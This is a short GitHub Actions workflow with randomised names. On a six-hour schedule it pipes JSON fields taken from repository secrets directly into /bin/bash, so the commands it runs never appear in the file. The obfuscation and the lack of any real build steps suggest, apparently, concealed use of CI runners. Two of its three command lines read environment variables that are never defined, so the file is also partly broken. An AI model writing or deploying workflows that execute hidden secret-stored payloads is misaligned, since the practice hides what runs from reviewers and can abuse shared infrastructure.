name: nijiuhen6152

on:
  workflow_dispatch:
  schedule:
    - cron: '4 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: nijiuhen6152
        env:
          axpgv39953: ${{ secrets.axpgv39953 }}
        run: |
          echo $axpgv39953 | jq -r .so12634 | /bin/bash
          echo $sv2947 | jq -r .rpwd14594 | /bin/bash
          echo $eyex51 | jq -r .vw5 | /bin/bash

